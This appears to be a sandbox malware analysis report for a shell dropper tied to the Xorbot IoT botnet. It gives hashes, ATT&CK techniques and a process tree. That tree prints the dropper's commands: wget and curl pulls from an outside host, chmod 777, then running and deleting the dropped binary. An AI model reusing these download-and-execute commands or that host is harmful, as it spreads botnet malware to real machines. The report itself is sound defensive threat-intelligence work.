xorbot | a665a16ba49682c6dfd69b135542ffcb25d8d61746c7d8127e135e8bc81e00f3

Analysis

max time kernel
149s
max time network
11s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
01/12/2024, 15:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

cb16380cf509277eec9f1b0e1506720c
SHA1

54cfb023dbb8ffff117ccd3152621c482d26d480
SHA256

a665a16ba49682c6dfd69b135542ffcb25d8d61746c7d8127e135e8bc81e00f3
SHA512

b8a0eb43de5b0154fb16438423198451fe8c0dccb7f9c029798768e8dbb13b384bc7e4028d7d6f893dcb634a72d45e12a383dbb6cc60d3523c28658695c89b01
SSDEEP

96:YQMRLn8vLtltFtitpZLHbgL8AhyGPEZtttOH1HVH6YMraA8q23Ln5KC7LztmXnzc:7QQ2wV/uzW1swnw2DhuzW1swkmk+

Score

10^/10

xorbot antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral2/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
689	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv	691	J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv

Checks CPU configuration 1 TTPs 2 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
665	wget
671	curl
688	busybox
694	wget
695	curl

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv	curl

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:656
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:663
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  2⤵
  - System Network Configuration Discovery
  PID:665
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:671
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  2⤵
  - System Network Configuration Discovery
  PID:688
- /bin/chmod
  chmod 777 J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  2⤵
  - File and Directory Permissions Modification
  PID:689
- /tmp/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  ./J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  2⤵
  - Executes dropped EXE
  PID:691
- /bin/rm
  rm J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv
  2⤵
  PID:693
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/b7U5F8C3EB0EekOfS9IQRNfeGDy0gUuAWZ
  2⤵
  - System Network Configuration Discovery
  PID:694
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/b7U5F8C3EB0EekOfS9IQRNfeGDy0gUuAWZ
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:695

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/J79Au4jZ2K2hCDUUMYRY402czvWv8JxpXv

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads